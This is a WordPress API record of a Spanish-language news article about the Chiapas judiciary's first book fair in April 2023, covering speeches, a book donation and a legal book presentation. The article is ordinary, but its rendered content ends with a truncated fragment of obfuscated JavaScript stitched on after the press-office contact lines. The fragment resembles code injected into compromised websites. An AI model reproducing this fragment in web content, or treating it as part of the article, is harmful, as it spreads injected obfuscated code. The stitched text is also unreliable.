{"id":9625,"date":"2023-04-19T04:37:36","date_gmt":"2023-04-19T04:37:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9625"},"modified":"2023-04-19T04:37:37","modified_gmt":"2023-04-19T04:37:37","slug":"realiza-poder-judicial-la-primera-feria-del-libro-2023","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9625","title":{"rendered":"Realiza Poder Judicial la Primera Feria del Libro 2023"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230418-WA0026-1024x771.jpg\" alt=\"\" class=\"wp-image-9627\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230418-WA0026-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230418-WA0026-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230418-WA0026-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230418-WA0026-1536x1157.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230418-WA0026.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-La familia del Poder Judicial y el p\u00fablico en general, podr\u00e1 disfrutar de una semana de sana convivencia y de aprendizaje en esta Primera Feria del Libro.<\/p>\n\n\n\n<p>El magistrado presidente del Tribunal Superior de Justicia del Estado y del Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, dio por inaugurada la 1\u00aa Feria del Libro 2023, que se realizar\u00e1 del 17 al 21 de abril, donde se llevar\u00e1 a cabo presentaciones de libros, cuentacuentos, exposiciones de libros, ventas y talleres para ni\u00f1os, de forma gratuita para la familia judicial y al p\u00fablico general que deseen participar.<\/p>\n\n\n\n<p>En la inauguraci\u00f3n, el magistrado presidente Guillermo Ramos P\u00e9rez estuvo acompa\u00f1ado de la directora del Consejo Estatal para las Culturas y las Artes de Chiapas, Maritsa Concepci\u00f3n Maranto Zepeda, la y el consejero de la Judicatura, Zelmira Perla del Roc\u00edo Guti\u00e9rrez Beltr\u00e1n y Omar Heleria Reyes, y armonizando antes y despu\u00e9s de la inauguraci\u00f3n la Marimba Orquesta de Seguridad P\u00fablica.<\/p>\n\n\n\n<p>El magistrado presidente Ramos P\u00e9rez manifest\u00f3 ante todas y todos los presentes, estar agradecido y tener el gran honor de presenciar esta primera feria del libro que se celebra en el Poder Judicial del Estado de Chiapas, instituci\u00f3n que se acerca a los 200 a\u00f1os de su formaci\u00f3n, donde se trabaja en conjunto no solo para ser reconocida por impartir justicia, sino que tambi\u00e9n pueda percibirse en la concepci\u00f3n social que fomenta la cultura, el deporte y el respeto a las tradiciones.<\/p>\n\n\n\n<p>Asimismo, resalt\u00f3 que la lectura es muy importante para todas y todos, y para todas las materias, pero en el derecho, nos ayuda a enriquecer nuestro lenguaje, la forma de escribir y la forma de expresarse, por ello, en este Poder Judicial se continua dando impulso al legado de nuestro Gobernador Constitucional, Rutilio Escand\u00f3n, quien cuando estuvo al frente de esta casa de la justicia, siempre estuvo muy interesado y fue un incansable promotor de la cultura y el deporte, tal y como lo hace ahora siendo gobernador del estado.<\/p>\n\n\n\n<p>\u201cSomos testigos de las pol\u00edticas publicas enfocadas al fortalecimiento de la cultura, esto es una muestra, y en particular al fomento de la lectura que este es un gobierno abierto que esta haciendo por ello, un trabajo excepcional, realizar esta primera feria del libro, es una muestra del compromiso que asumimos para sumar esfuerzos para un Chiapas cada vez mejor\u201d, recalc\u00f3 el presidente Guillermo Ramos.<\/p>\n\n\n\n<p>Por su parte, la directora general del Consejo Estatal para las Culturas y las Artes de Chiapas, Maritsa Concepci\u00f3n Maranto Zepeda agradeci\u00f3 la invitaci\u00f3n a esta celebraci\u00f3n, porque donde se fomente la lectura hay que celebrarlo.<\/p>\n\n\n\n<p>&#8220;Un libro te da la posibilidad de ver a la vida con todos los matices, pero cuando ese libro transforma en quien lo lee en escritor, entonces existe una posibilidad que s\u00f3lo, a mi punto de vista, lo da la literatura, poder reescribir tu propia historia, eso es lo que tiene el l\u00e1piz y el papel&#8221;, dijo Maranto Zepeda.<\/p>\n\n\n\n<p>Adem\u00e1s, se llev\u00f3 a cabo la entrega de una donaci\u00f3n simb\u00f3lica de libros por parte de la directora Maritza Zepeda al Poder Judicial, y la entrega de un reconocimiento de la Asociaci\u00f3n de Libreros del Estado de Chiapas, a cargo de Julio S\u00e1nchez Esquinca al magistrado presidente Guillermo Ramos P\u00e9rez.<\/p>\n\n\n\n<p>Finalizando el acto inaugural, se llev\u00f3 a cabo de forma presencial y por transmisi\u00f3n en Facebook live, la presentaci\u00f3n del libro La Argumentaci\u00f3n Jur\u00eddica en el Proceso Penal Acusatorio por el doctor Faustino Guerrero Posadas, autor de varios libros, con una amplia trayectoria y asesor de esta casa de la justicia, donde dio a conocer paso a paso el contenido de su autor\u00eda, a trav\u00e9s de su experiencia en todos los cargos p\u00fablicos que ha ejercido.<\/p>\n\n\n\n<p>En el evento estuvieron presentes magistradas y magistrados; juezas y jueces; el cronista honorario del Poder Judicial, Jorge Alejandro S\u00e1nchez; rectores de diferentes universidades; integrantes de la Asociaci\u00f3n de Libreros del Estado de Chiapas, as\u00ed como personal de las diversas \u00e1reas administrativas y jurisdiccionales de esta casa de la justicia.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;<\/p>\n\n\n\n<p>: \/poderjudicial.chiapas&nbsp;t&nbsp;<\/p>\n\n\n\n<p>: @PJE_Chiapas<\/p>\n<\/blockquote>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-La familia del Poder Judicial y el p\u00fablico en general, podr\u00e1 disfrutar de una semana de sana convivencia y de aprendizaje en esta Primera Feria del Libro. El magistrado presidente del Tribunal Superior de Justicia del Estado y del Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9627,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9625","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9625"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9625\/revisions"}],"predecessor-version":[{"id":9628,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9625\/revisions\/9628"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9627"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}